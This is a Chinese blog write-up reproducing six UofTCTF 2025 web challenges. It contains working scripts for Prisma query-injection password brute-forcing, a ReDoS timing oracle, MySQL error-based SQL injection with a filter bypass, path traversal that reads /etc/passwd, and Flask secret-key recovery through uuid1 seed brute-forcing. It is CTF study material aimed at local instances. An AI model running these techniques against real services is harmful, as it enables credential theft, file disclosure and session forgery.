UofTCTF-2025-web-复现
感兴趣朋友可以去我博客里看,画风更好看
UofTCTF-2025-web-复现
文章目录
- scavenger-hunt
- prismatic-blogs
- code-db
- prepared-1
- prepared-2
- timeless
scavenger-hunt
国外的一些ctf简单题就喜欢把flag藏在注释里,开源代码找到第一部分的flag
抓个包返回数据显示304,说明内容没有被更新,剩下的flag很有可能也是被藏起来了。
开dirsearch扫一下,意外找到part4的flag

去提示地址,拿到part6的flag(这里差点漏了一个细节,之前找信息时顺手把cookie里的guess改成了admin,要经过这步修改才能进到part6)
同时在part6的cookie里还有part3的值
正在想按顺序找的话part2会不会在网络里,结果在这偶遇part5
发现一段可疑js代码,丢给grok分析一手,发现是主页面显示那段废话文字的,没啥用。
剩下part2和part7没思路了,看看wp吧
原来part7在这个路由里,当时看见了但感觉不太可能访问
part2是在header里,即响应标头,在网络里(被part5带偏了)
prismatic-blogs
这道题有意思的地方是它是sqlite数据库,但是js的prsima库会将nosql查询语句自动解析为适配sqlite数据库的sql语句
Prisma 的统一 API:
-
Prisma 的 where 条件语法与 MongoDB 类似(支持 AND、startsWith 等),即使底层是 SQLite。
-
攻击者注入的查询(如 startsWith)被 Prisma 转换为 SQLite 的 LIKE,使得攻击行为类似于 NoSQL 注入。
在posts页面可以插入查询语句,且没有任何过滤
app.get("/api/posts",async (req, res) => {try {let query = req.query;query.published = true;let posts = await prisma.post.findMany({where: query});res.json({success: true, posts})} catch (error) {res.json({ success: false, error });}}
);
我们需要做的就是在这里爆出登录密码(用户名都是已知的),接着去login路由登录即可拿到flag
构造一手
AND: [author: {password: {startsWith: abcdefg}},author: {name: {equals: Bob}}
]
转换为url查询参数,AND[0]表示AND的第一个条件
import requests
import json
s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
cha=''
for i in range(25):for c in s:res=requests.get(f"http://localhost:70/api/posts?AND[0][author][name]=Bob&AND[0][author][password][startsWith]={cha+c}")if res.json().get('posts'):cha+=cprint(cha)
这里startsWith是不区分大小写的,所以在爆出密码后再用lt逻辑分出大小写即可,但单一的lt或lte比较不能确定大小写,因为如果前几个字符相等,那么长度短的字符会被认为是更小的。此时就会对我们的if判断产生影响。所以我们采取替换字符避免出现相等误判的现象
我们假设逻辑是
for j in cha:tmp+=chr(ord(j)+1)
AND[1][author][password][lt]={tmp}
假设比较到字符A
构造密码串 | 真实密码串 | 逻辑 |
---|---|---|
A< | Ab | 相等判定为小于 |
a< | ab | 相等判定为小于 |
A< | ab | 小于 |
a> | Ab | 大于 |
我们采取双重限制条件,首先把构造字符串全部转为大写便于思考
假设构造字符为A,真实字符为x,再加入一个字符B(A+1)
if A<=x and B>x 说明 x=A
if A<x and B<x 说明x=a
这样就可以确定真实密码到底是小写还是大写了
password=''
tmp=''
for j in cha:tmp=passwordj=j.upper()next=chr(ord(j)+1)res2=requests.get(f"http://localhost:70/api/posts?AND[0][author][name]=Bob&AND[1][author][password][gte]={tmp+j}&AND[2][author][password][lt]={tmp+next}")if res2.json().get('posts'):password+=jelse:password+=j.lower()print(password)
拿到密码后登录即可看到flag
code-db
打开页面是一个搜索框,/fla*/可以进行正则匹配,直接输字符串也可以,看源码将flag.txt设置为不可见
尝试绕过无果,看wp吧,原来是redos正则匹配。
简单的说,就是类似sql注入里的时间盲注,通过构造特定的正则表达式,逐位增加字符,如果增加的字符是flag的内容匹配到了,就会返回的很快,如果匹配不上,就会返回的很慢,通过这个时间差异来拿到flag的字符。
中途学了一些正则匹配相关的东西
phithon
发包时注意将正则匹配相关的字符替换,如*替换为\*
思路其实不难,payload构造成
payload=f"/^(?={tmp})(((((((((.*)*)*)*)*)*)*)*)*)!!!$/"
或者
payload=f"/^(?={tmp}).*.*.*.**.*.*.*.*!!!$/"
import time
import string
from tqdm import tqdm
import reurl="http://localhost:90/search"
def postdata(query):op=time.time()requests.post(url,json={"query":query,"language":"All"})np=time.time()return np-opdef repla(query):return re.sub(r'([.*+?^${}()|[\]\\])',r'\\\1',query)flag="uoftctf{"
while true:for i in tqdm(string.printable):tmp=repla(flag+i)payload=f"/^(?={tmp})(((((((((.*)*)*)*)*)*)*)*)*)!!!!!!!$/"if postdata(payload)>0.8:flag+=iprint(flag)breakif flag.endswith("}"):break
这里的时间设置为0.8,发几个数据测一下就出来了,做的时候脑子没想明白,发包过去时间一直是0.03左右,想着进行正则回溯时间不应该很长才对吗,后来突然看到正确flag的时间是0.93,突然想明白了,要进行后面的回溯匹配,首先得满足前面flag以正确字符开头的条件,所以正确字符反而会用更多的时间。
prepared-1
熟悉的登录页面,随便测了几个弱密码不让进,看看附件,发现是MySQL数据库,过滤了特殊字符和不可打印字符
MALICIOUS_CHARS = ['"', "'", "\\", "/", "*", "+" "%", "-", ";", "#", "(", ")", " ", ","]
麻烦的地方在于过滤了不可打印字符,也就是说只可以用ascll表上可见的字符,用%00和/**/替代空格显然不行,十六进制也绕不过去。
看了看wp,绕不过去,需要利用到format_map函数
query = query.format_map(type('FormatDict', (), {'__getitem__': lambda _, k: format_map[k] if isinstance(format_map[k], str) else format_map[k]("",k)
})())
有键则替换,无键则保留占位符
方法签名:
str.format_map(mapping)
参数:
- mapping:一个支持键访问的对象,通常是字典(dict)或实现了 getitem 方法的自定义对象。
返回值:
- 返回一个新字符串,其中字符串中的占位符 {key} 被替换为 mapping[key] 的值。
所属模块:
- format_map 是 Python 内置的 str 类方法,无需导入额外模块。
引入版本:
- Python 3.2 及以上。
基本用法(字典)
template = "Hello, {name}! You are {age} years old."
mapping = {"name": "Alice", "age": 25}
result = template.format_map(mapping)
print(result) # 输出: Hello, Alice! You are 25 years old.
而对字符的过滤,我们可以用str.__doc_中的字符来替换
关键点:
- format_map() 只负责替换占位符,它不关心占位符的内容是什么。
- 是否能“还原为原始字符”,取决于:
- 字符串中的占位符是什么(比如 {password._class_._doc_[11]})。
- mapping 如何定义这些占位符的值。
通俗理解:format_map() 就像一个“填空机”,你给它一个模板(字符串)和一个“答案表”(mapping),它就把模板里的 {key} 替换成答案表里的值。它不会自己去解析 str._doc_,但如果答案表提供了正确的映射,它可以间接实现“还原”。
replacements = {"'": "{password.__class__.__doc__[11]}"," ": "{password.__class__.__doc__[14]}","-": "{password.__class__.__doc__[15]}",",": "{password.__class__.__doc__[42]}","(": "{password.__class__.__doc__[3]}",")": "{password.__class__.__doc__[13]}"
}
替换之后就可以正常执行sql语句了,常规方法拿到flag即可,这里学到一个新东西,报错注入的updatexml函数
updatexml(1,concat(0x7e,(select substring(flag,{i},20) from flags),0x7e),1)
0x7e是,因为在语法中是运算符,所以用0x7e来代替,用于区别出flag
import requestsurl='http://localhost:70'
for i in range(1,50,20):username=f"admin' and updatexml(1,concat(0x7e,(select substr(flag,{i},20) from flags),0x7e),1) -- "password="test"replacements = {"'": "{password.__class__.__doc__[11]}"," ": "{password.__class__.__doc__[14]}","-": "{password.__class__.__doc__[15]}",",": "{password.__class__.__doc__[42]}","(": "{password.__class__.__doc__[3]}",")": "{password.__class__.__doc__[13]}"}for a,b in replacements.items():username=username.replace(a,b)payload={"username":username,"password":password}res=requests.post(url=url,data=payload)print(res.text)
prepared-2
跟prepared-1用的是同一个环境,需要在shell中运行/readflag
wp看不懂,用到的东西感觉很像pwn相关的知识
wp
timeless
生成密钥的种子跟时间有关
START_TIME = datetime.now()
random.seed(int(START_TIME.timestamp()))
SECRET_KEY = str(uuid.uuid1(clock_seq=random.getrandbits(14)))
还有一个status路由展示时间
@app.route('/status', methods=['GET'])
def status():current_time = datetime.now()uptime = current_time - app.config['START_TIME']return jsonify({"status": "ok", "server_time": str(current_time), "uptime": str(uptime)})
关于os.path.join这个函数,如果第二个参数是绝对路径,那么将会覆盖第一个参数,所以我们可以利用username来进行路径遍历,而profile_photo的默认值为none,在这种情况下,将提供 /app/uploads/default.png
。如果我们上传头像,值将更新为hash.xxx,而且由于时间戳,我们无法计算出hash值
file_path = os.path.join(app.config['UPLOAD_FOLDER'], user.username + user.profile_photo)
if not os.path.exists(file_path):return send_file(os.path.join(app.static_folder, 'default.png'))
return send_file(file_path)
但是继续往下看,作者放了一条生路在这里,except语句中放了内容,这就很可疑了,如果保存文件失败,那么,profile_photo将会被设置为空,这就达到我们的效果了,如果我们传入的路径是/etc/passwd,它并不是一个文件夹,就会触发保存失败的逻辑。因此,下次我们访问 /profile_picture
时,file_path 将指向 /etc/passwd
,并且该文件将被提供。到达这一步,即可完成本地文件读取。
if not os.path.exists(filepath):try:user.profile_photo = "/"+save_filenamefile.save(filepath)except:user.profile_photo = ''flash('Failed to save file', 'error')return redirect(url_for('profile_get'))finally:db.session.commit()
写一个简单的脚本
import requests
url='http://localhost:70'
session=requests.session()info={"username":"/etc/passwd","password":"123"
}
session.post(url=url+"/register",data=info)
res=session.post(url=url+"/login",data=info)session.post(url=url+"/profile",files={"about_me":'aaa',"profile_photo":("a.png",'xxx')
})response=session.get(url=url+"/profile_picture",params={"username":"/etc/passwd"})
print(response.text)
第二步,我们计算secret_key
secret_key是用uuid1生成的,下面是它的实现
def uuid1(node=None, clock_seq=None):"""Generate a UUID from a host ID, sequence number, and the current time.If 'node' is not given, getnode() is used to obtain the hardwareaddress. If 'clock_seq' is given, it is used as the sequence number;otherwise a random 14-bit sequence number is chosen."""""" snap """global _last_timestampimport timenanoseconds = time.time_ns()# 0x01b21dd213814000 is the number of 100-ns intervals between the# UUID epoch 1582-10-15 00:00:00 and the Unix epoch 1970-01-01 00:00:00.timestamp = nanoseconds // 100 + 0x01b21dd213814000if _last_timestamp is not None and timestamp <= _last_timestamp:timestamp = _last_timestamp + 1_last_timestamp = timestampif clock_seq is None:import randomclock_seq = random.getrandbits(14) # instead of stable storagetime_low = timestamp & 0xfffffffftime_mid = (timestamp >> 32) & 0xfffftime_hi_version = (timestamp >> 48) & 0x0fffclock_seq_low = clock_seq & 0xffclock_seq_hi_variant = (clock_seq >> 8) & 0x3fif node is None:node = getnode()return UUID(fields=(time_low, time_mid, time_hi_version,clock_seq_hi_variant, clock_seq_low, node), version=1)
它接收两个参数,一个是node,如果没有则用getnode()函数获取其mac地址,一个是clock_seq,即时间戳。在这个题里面时间戳不难找到,但是mac地址呢,这里学到一个很强的点,服务器的mac地址写在 /sys/class/net/eth0/address
里。但是直接用get读会报错,HTTP 响应数据不完整,服务器声称要发送 4096 字节(18 + 4078),但只收到 18 字节,导致连接中断。这时候可以加一个参数stream=true来解决。
t = b""
try:response2 = session.get(url=url+"/profile_picture", params={"username": "/sys/class/net/eth0/address"}, stream=True)for chunk in response2.iter_content(chunk_size=1):if chunk:t += chunkexcept:pass
print(t)
这里也是有一个比较玄学的点,print语句一定要放在try语句外面,否则会报错。想想大概是这样,当for循环往后面读到不存在内容的字节流时可能会引发print的某种错误。
mac地址搞定了,去status路由拿个时间
{"status":"ok","server_time":"2025-04-21 09:56:23.761822","uptime":"0:18:40.264980"}
通过计算 server_time - 正常运行时间
,我们可以以毫秒级精度确定 START_TIME
。因此,可以计算 random.seed
的种子。
这时候mac地址和时间戳都有了,想拿到secret其实不难,拿到后进行验证即可,如果不对就在100ns内进行小范围爆破
from itsdangerous import Signer
token = s.cookies['session']
value = token.split('.')[0]
sig = token.split('.')[1]
signer = Signer(SECRET_KEY, 'flask-session',key_derivation="hmac")
if signer.verify_signature(value, sig):print(SECRET_KEY)
.分隔的前一段字符是value值,后一段字符是将value利用secret加密产生的hmac码,只要我们的value用自己的secret加密后产生的hmac码与之相等,就说明secret正确了。
后续是打一个pickle反序列化,但是奇怪的是这里怎么都爆不出来secret,于是进行不下去了。
import datetime
import requests
import random
import uuid
from itsdangerous import Signer
from tqdm import *
import json
url='http://localhost:70'
session=requests.session()info={"username":"/sys/class/net/eth0/address","password":"123"
}
session.post(url=url+"/register",data=info)
res=session.post(url=url+"/login",data=info)token=session.cookies["session"]session.post(url=url+"/profile",files={"about_me":'aaa',"profile_photo":("a.png",'xxx')
})
t = b""
try:response2 = session.get(url=url+"/profile_picture", params={"username": "/sys/class/net/eth0/address"}, stream=True)for chunk in response2.iter_content(chunk_size=1):if chunk:t += chunkexcept:pass
mac=t.strip().decode()timetxt=session.get(url=url+"/status")
data=json.loads(timetxt.text)server_time_str = data['server_time']
uptime_str = data['uptime']server_time = datetime.datetime.strptime(server_time_str, "%Y-%m-%d %H:%M:%S.%f")
uptime = datetime.timedelta(hours=int(uptime_str.split(':')[0]),minutes=int(uptime_str.split(':')[1]),seconds=float(uptime_str.split(':')[2])
)
start_time = server_time - uptimevalue, sig = token.split(".")mac_int = int(mac.replace(":", ""), 16)
start_timestamp = start_time.timestamp()found = False
for i in trange(-100000000, 100000000): # 以100ns(0.0000001秒)为单位进行爆破# 用伪种子初始化随机数seed = start_timestamp + i * 1e-7random.seed(seed)clock_seq = random.getrandbits(14)# 构造 uuid1(使用已知的 mac 地址 + clock_seq)uid = uuid.uuid1(clock_seq=clock_seq, node=mac_int)secret_key = str(uid)# 使用该 key 进行签名验证signer = Signer(secret_key,'flask-session', key_derivation="hmac")try:if signer.verify_signature(value, sig):print("[🎯] 找到 SECRET_KEY:", secret_key)found = Truebreakexcept Exception:pass
后来看到一个脚本似乎是要将uuid1内部计算的一些参数也算出再放进去才可行
server_time = datetime.strptime(r.json()['server_time'], "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)
uptime = datetime.strptime(r.json()['uptime'], "%H:%M:%S.%f").replace(tzinfo=timezone.utc)
uptime = timedelta(hours=uptime.hour, minutes=uptime.minute, seconds=uptime.second, microseconds=uptime.microsecond)random.seed(int((server_time - uptime).timestamp()))
clock_seq = random.getrandbits(14)
clock_seq_low = clock_seq & 0xff
clock_seq_hi_variant = (clock_seq >> 8) & 0x3fSECRET_KEY = None
value = token.split('.')[0]
sig = token.split('.')[1]for ns_diff in range(10_000_000):timestamp = int((server_time - uptime).timestamp() * 10_000_000) + 0x01b21dd213814000 + ns_difftime_low = timestamp & 0xfffffffftime_mid = (timestamp >> 32) & 0xfffftime_hi_version = (timestamp >> 48) & 0x0fffnode = int(mac.replace(":",""),16)SECRET_KEY = str(uuid.UUID(fields=(time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node), version=1))signer = Signer(SECRET_KEY, 'flask-session',key_derivation="hmac")if signer.verify_signature(value, sig):print(SECRET_KEY)break
相关文章:
UofTCTF-2025-web-复现
感兴趣朋友可以去我博客里看,画风更好看 UofTCTF-2025-web-复现 文章目录 scavenger-huntprismatic-blogscode-dbprepared-1prepared-2timeless scavenger-hunt 国外的一些ctf简单题就喜欢把flag藏在注释里,开源代码找到第一部分的flag 抓个包返回数据…...
记录seatunnel排查重复数据的案例分析
文章目录 背景分析检查现象检查B集群是否有异常,导致重复消费的分析同步任务 修复问题发现flink job 一直报异常修复问题 背景 使用seatunnel 同步数据从A 集群kafka 同步到B集群kafka,现象是发现两边数据不一致,每天10w级别会多几十条数据 分析 检查…...
技术速递|Agent 模式:对所有用户开放,并支持 MCP
作者:Isidor Nikolic 翻译/排版:Alan Wang Agent 模式正在向所有 VS Code 用户推广!它充当一个自主的配对编程助手,能够根据你的指令执行多步编码任务,例如分析代码库、提出文件修改建议以及运行终端命令。它能够响应编…...
实验四 Java图形界面与事件处理
实验四 Java图形界面与事件处理 ###实验目的 掌握Java语言中AWT和Swing组件的基本用法掌握Java语言中的事件处理方法掌握Java语言中事件源、监视器和处理事件的接口的概念 ###实验内容 图形用户界面设计程序(ArtFont.java)(90分) 要求:设…...
day2 python训练营
浙大疏锦行 python训练营介绍...
Linux下 REEF3D及DIVEMesh 源码编译安装及使用
目录 软件介绍 基本依赖 一、源码下载 1、REEF3D 2、DIVEMesh 二、解压缩 三、编译安装 1、REEF3D 2、DIVEMesh 四、算例测试 软件介绍 REEF3D是一款开源流体动力学框架,提供计算流体力学及波浪模型。软件采用高效并行化设计,可以在大规模处理器…...
堡垒机和跳板机之区别(The Difference between Fortress and Springboard Aircraft)
堡垒机和跳板机之区别 在网络安全、安全运维领域,堡垒机和跳板机是两个常被提及且功能相似的概念,但它们在实际应用、功能定位以及技术实现上存在着明显的差异。本文将对堡垒机和跳板机进行详细的解析与比较,帮助读者更好地理解这两种网络安…...
《Android 应用开发基础教程》——第五章:RecyclerView 列表视图与适配器机制
目录 第五章:RecyclerView 列表视图与适配器机制 5.1 为什么要使用 RecyclerView? 5.2 基本结构图 5.3 RecyclerView 使用步骤 1️⃣ 添加 RecyclerView 依赖(Android Studio) 2️⃣ 布局文件(activity_main.xml&…...
【第四章】19-匹配规则定义
在优化Web服务器性能与增强其功能性的过程中,深入理解Nginx的location匹配规则显得尤为关键。它不仅决定了如何高效地路由不同类型的客户端请求,而且是实现精准响应的基础。通过掌握精确匹配、前缀匹配及正则表达式匹配等规则,管理员能够灵活配置以支持复杂的业务需求,同时…...
[PTA]2025CCCC-GPLT天梯赛 现代战争
来源:L1-112 现代战争-Pintia题意:给定 n m n\times m nm 的矩阵,进行 k k k 次操作,每次操作清除矩阵当前最大值所在行和所在列的全部元素,求最终矩阵。关键词:模拟(签到)题解:非常水的模拟…...
操作系统期中复习
未完待续----后续补充全书完整板 一、计算机系统概述 1.1操作系统的基本概念 1.1.1操作系统的概念 操作系统:是指控制和管理整个计算机系统的硬件与软件资源,合理地组织、调度计算机的工作与资源的分配,进而为用户和其他软件提供方便接口…...
Linux 入门十一:Linux 网络编程
一、概述 1. 网络编程基础 网络编程是通过网络应用编程接口(API)编写程序,实现不同主机上进程间的信息交互。它解决的核心问题是:如何让不同主机上的程序进行通信。 2. 网络模型:从 OSI 到 TCP/IP OSI 七层模型&…...
车载软件架构 --- 二级boot设计说明需求规范
我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 周末洗了一个澡,换了一身衣服,出了门却不知道去哪儿,不知道去找谁,漫无目的走着,大概这就是成年人最深的孤独吧! 旧人不知我近况,新人不知我过…...
在Ubuntu下用Chrony做主从机时间同步
主机 下载chrony sudo apt install chrony修改配置文件: sudo gedit /etc/chrony/chrony.conf# Welcome to the chrony configuration file. See chrony.conf(5) for more # information about usuable directives.# This will use (up to): # - 4 sources fro…...
开箱即用:一款带世界时钟简约好用在线时间戳转换工具源码
这款工具简直是为“时间管理大师”和“国际化玩家”量身定制!它不仅支持全球十大热门语言,还能无缝切换多时区,帮你轻松搞定时间戳和日期的转换。重点是,它完全前端实现,无需复杂后端,部署起来比泡杯咖啡还简单!开发人员可以在本地电脑运行来进行时间戳装换,还可以加Ad…...
代码随想录第22天:回溯算法4
一、全排列(Leetcode 46) 与组合问题不同,排列问题要注意2个特点: 每层都是从0开始搜索而不是startIndex需要used数组记录path里都放了哪些元素 class Solution:def permute(self, nums):result [] # 存储所有的排列self.back…...
cdq 系列 题解
从二维数点(二维偏序)到三维偏序。 用 cdq 分治可以解决二维数点问题。 1.洛谷 P1908 逆序对 题意 求所有数对 ( i , j ) (i,j) (i,j) 的个数,满足 i < j i<j i<j 且 a i > a j a_i>a_j ai>aj。 1 ≤ n ≤ 5 1…...
稳压二极管详解:原理、作用、应用与选型要点
一、稳压二极管的基本定义 稳压二极管(齐纳二极管,Zener Diode) 是一种利用反向击穿特性实现电压稳定的半导体器件。其核心特性是:在反向击穿时,两端电压几乎恒定(Vz),且不会因电流…...
如何在量子计算时代保障 Sui 的安全性
量子计算的出现对依赖加密机制的系统构成了重大威胁。区块链依赖加密技术来进行身份管理、安全交易和数据完整性保护,而量子计算具备打破传统加密模型的能力,因此区块链面临特别严峻的挑战。 然而,Sui 天生具备“加密灵活性”,可…...
linux sysfs使用cat无显示的原因:返回值未赋值
在Linux驱动中通过sysfs定义的文件使用cat命令无显示,通常由以下原因导致: 1. show函数未正确实现 原因:show函数(如show_status)未正确填充缓冲区或返回有效字节数。 排查: // 错误示例:未写…...
Discuz论坛网站忘记管理员密码进不去管理中心怎么办?怎么改管理员密码?
Discuz论坛网站忘记管理员密码进不去管理中心怎么办?怎么改管理员密码?今天驰网飞飞和你分享 首先我们需要用到Discuz!急诊箱tools.php这个文件,可在下载中心搜索关键词下载,下载好后将tools.php文件放到网站根目录&a…...
基于LangChain与Neo4j构建企业关系图谱的金融风控实施方案,结合工商数据、供应链记录及舆情数据,实现隐性关联识别与动态风险评估
以下是基于LangChain与Neo4j构建企业关系图谱的金融风控实施方案,结合工商数据、供应链记录及舆情数据,实现隐性关联识别与动态风险评估: 一、数据整合与图谱构建 多源数据融合与清洗 • 数据源:整合企业工商数据(股权…...
数据结构第六章(五)-拓扑排序、关键路径
数据结构第六章(五) 图的应用(二)一、有向无环图二、拓扑排序1. AOV网2. 拓扑排序3. 逆拓扑排序 三、关键路径1.AOE网2.关键路径2.1 介绍2.2 关键路径的求法 总结 图的应用(二) 一、有向无环图 首先我们得…...
stc32单片机实现串口2M波特率满带宽传输
我需要实现已极高的速度用串口往上位机发送数据, 并且还不能占用mcu资源, 使用的单片机位stc32g8K64 我的方法是串口接收采用中断接收, 发送采用dma自动发送, 预先初始化16个64字节的缓冲区, 每次通过串口发送时, 先找到当前的空闲缓冲区, 然后往缓冲区里填充数据, 在dma传输完…...
uni-app 状态管理深度解析:Vuex 与全局方案实战指南
uni-app 状态管理深度解析:Vuex 与全局方案实战指南 一、Vuex 使用示例 1. 基础 Vuex 配置 1.1 项目结构 src/ ├── store/ │ ├── index.js # 主入口文件 │ └── modules/ │ └── counter.js # 计数器模块 └── main.js …...
STM32之DHT11温湿度传感器---附代码
DHT11简介 DHT11的供电电压为 3-5.5V。 传感器上电后,要等待 1s 以越过不稳定状态在此期间无需发送任何指令。 电源引脚(VDD,GND)之间可增加一个100nF 的电容,用以去耦滤波。 DATA 用于微处理器与DHT11之间…...
Fluent 内置双向流固耦合FSI 液舱晃荡仿真计算
本案例利用Fluent 内置双向流固耦合FSI对液舱晃荡仿真展开了计算,提供了一种更为便捷快速的分析方法,对不同杨氏模量的液舱内部构件进行分析,后续可以通过该案例对不同的双向流固耦合模型展开计算分析。 1 SCDM 设置 1.1 导入几何 本案例根…...
嵌入式开发板调试方式完全指南:串口/SSH/Telnet及其他方式对比
文章目录 💻嵌入式开发板调试方式完全指南:串口/SSH/Telnet及其他方式对比一、为什么需要连接嵌入式开发板❓二、串口调试:最古老的调试方式仍在发光🏛️2.1 什么是串口调试? 三、SSH/Telnet:网络时代的调试…...
JavaScript数据结构与算法实战: 探秘Leetcode经典题目
# JavaScript数据结构与算法实战: 探秘Leetcode经典题目 第一章:掌握LeetCode经典题目 什么是LeetCode? 力扣)是一个专门为程序员提供算法题目练习的平台,涵盖了广泛的题目类型,包括数据结构、算法、数据库等多个领域。…...
内网穿透实践:cpolar快速入门教程
最近有个朋友联系我,问我有没有方法将自己做的项目让别人也能访问到,我寻思这不就是外网映射的事情。于是我很愉快的和他说,你去买个云服务器就行,尽管我一再和他说,个人新用户能有免费试用期,但是本着又蠢…...
HAL库(STM32CubeMX)——高级ADC学习、HRTIM(STM32G474RBT6)
系列文章目录 文章目录 系列文章目录前言存在的问题HRTIMcubemx配置前言 对cubemx的ADC的设置进行补充 ADCs_Common_Settings Mode:ADC 模式 Independent mod 独立 ADC 模式,当使用一个 ADC 时是独立模式,使用两个 ADC 时是双模式,在双模式下还有很多细分模式可选 ADC_Se…...
Kafka 详细解读
1. Producer(生产部卷王) 职责:往 Kafka 里疯狂输出数据,KPI 是「日抛式消息海啸」 职场人设: 白天开会画饼,深夜写周报的奋斗逼,口头禅是「这个需求今晚必须上线!」代码里的「福报…...
Python爬虫实战:获取高考网专业数据并分析,为志愿填报做参考
一、引言 高考志愿填报是考生人生的关键节点,合理的志愿填报能为其未来发展奠定良好基础。计算机类专业作为当下热门领域,相关信息对考生填报志愿至关重要。教育在线网站虽提供丰富的计算机类专业数据,但存在反爬机制,增加了数据获取难度。本研究借助 Scrapy 爬虫技术及多…...
Ubuntu下展锐刷机工具spd_dump使用说明
spd_dump使用说明 源码地址:https://github.com/ilyakurdyukov/spreadtrum_flash 编译环境准备: sudo apt update sudo apt install git sudo apt install build-essential sudo apt install libusb-1.0-0-devIf you create /etc/udev/rules.d/80-spd…...
配置 VS Code 使用 ESLint 格式化
1、在设置里面搜索Default Formatter,下拉框里选择eslint 2、并勾选Enables ESlint as a formatter 3、再在settings.json文件中添加配置代码,如下所示: 1) 、打开 VS Code 设置 快捷键:Ctrl ,(Mac: ⌘ ,…...
极刻云搜-专业的软件网址搜索引擎
软件名:极刻云搜 版本:v1.0 软件功能:搜索实用软件和网址 之前有个全网爆火的软件叫搜软 但是它满屏广告而且很久都没更新了 我看也有好多人在求这门类似的软件 我就按照它扒了一个一模一样的 软件丑是丑了点 但是这个功能确实简单粗暴 因为用…...
android Stagefright框架
作为Android音视频开发人员,学习Stagefright框架需要结合理论、源码分析和实践验证。以下是系统化的学习路径: 1. 基础准备 熟悉Android多媒体体系 掌握MediaPlayer、MediaCodec、MediaExtractor等核心API的用法。 理解Android的OpenMAX IL(…...
vscode 打开新页签
目录 vscode 打开新页签 完整settings.json内容: vscode 打开新页签 .vscode目录中 新建settings.json 在 settings.json 文件中,添加或修改以下行: json "workbench.editor.enablePreview": false 这将禁用预览模式࿰…...
【C++编程入门】:从零开始掌握基础语法
C语言是通过对C语言不足的地方进行优化创建的,C在C语言之上,C当然也兼容C语言, 在大部分地方使用C比C更方便,可能使用C需要一两百行代码,而C只需要五六十行。 目录 C关键字 命名空间 缺省参数 缺省参数分类 函数…...
Vue中如何优雅地阻止特定标签的移除并恢复其原始位置
Vue中如何优雅地阻止特定标签的移除并恢复其原始位置 在使用 Element Plus 或 Element UI 的 <el-select> 组件时,有时我们希望根据某些条件阻止用户移除特定的标签,并且在阻止移除后将该标签重新添加到其原始位置。这在处理与子项目关联的成员时特别有用。本文将详细…...
基于Arduino的ESP8266连接OneNET云平台(MQTT协议 物模型)(二)连接云平台
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、前期准备1.1 硬件配置1.2 软件环境配置 二、接线三、核心代码3.1 总代码 三、最终效果总结 前言 本系列将以0基础新手视角,完整演示ArduinoESP…...
空间注意力和通道注意力的区别
空间注意力和通道注意力是深度学习中两种常见的注意力机制。 1. 关注维度不同 通道注意力(Channel Attention) 对特征图的每个通道分配不同的权重,强调“哪些通道更重要”。例如,在RGB图像中,可能红色…...
git 版本提交规范
Git 提交规范(Git Commit Message Convention)是为了让项目的提交历史更加清晰、可读、便于追踪和自动化工具解析。常见的规范之一是 Conventional Commits,下面是一个推荐的格式规范: 🌟 提交信息格式(Con…...
Linux的基础的操作指令
一.目录文件:在Linux中的以d开头的文件,就叫做目录文件(Directory): 二.普通的文件:在Linux中的以-r开头的文件,就叫做普通的文件,他们通常以.txt .cpp .c为后缀: 三.pwd:查看当前目录的绝对路径:查看当前所在位置的目录的绝对路径…...
级联vs端到端、全双工、轮次检测、方言语种、商业模式…语音 AI 开发者都在关心什么?丨Voice Agent 学习笔记
编者按: A16Z在《AI Voice Agents: 2025 Update》中提到: 语音是 AI 应用公司最强大的突破之一。 它是人类沟通中最频繁(也是信息密度最高的)形式,AI 也让其首次变得“可编程”。 在13期Z沙龙,我们聚焦AI…...
使用Cloudflare加速网站的具体操作步骤
要通过Cloudflare加速网站,您需要按照以下步骤进行设置和配置。这些步骤包括域名设置、接入Cloudflare、配置缓存和其他设置,以及测试网站性能。 1. 注册Cloudflare账户 访问Cloudflare官网:前往 Cloudflare官网。创建账户:点击…...
编译原理实验(四)———— LR(1)分析法
一、实验目的 掌握LR(1)分析法的基本原理与实现流程。通过构造LR(1)分析表,验证符号串是否符合给定文法规则。理解LR(1)分析中向前搜索符(Lookahead Symbol)的作用,解决移进-归约冲突。 二、实验题目 1.对下列文法,用…...
【Redis】Jedis与Jedis连接池
目录 1. Jedis 单实例连接 2. Jedis 连接池(JedisPool) 3. JedisPool 与 Jedis 的区别 4. JedisPool 线程安全 6. 使用 JedisPool 的注意事项 1. Jedis 单实例连接 在最简单的用法中,Jedis 提供了直接与 Redis 服务器连接的方式。这适合…...
MongoDB数据库的安装到入门使用详细讲解
本篇文章主要讲解MongoDB的安装使用教程及基础的数据库管理和操作能力的讲解,通过本篇文章您可以快速的掌握对MongDB数据库的基本认识及,基础开发能力。 一、MongoDB介绍 MongoDB是一款免费开源的非关系型数据库,该数据库适应于复杂关系的存储和管理,非常适合数据结构复杂…...
Argo CD
文章目录 一、什么是 Argo CD二、为什么选择 Argo CD三、Argo CD 架构1、API服务器2、存储库服务器3、应用程序控制器 四、Argo CD 的使用1、要求2、安装 Argo CD2.1、创建 argocd 命名空间2.2、部署 Argo CD2.3、验证部署是否成功 3、下载 Argo CD CLI4、发布 Argo CD 服务器5…...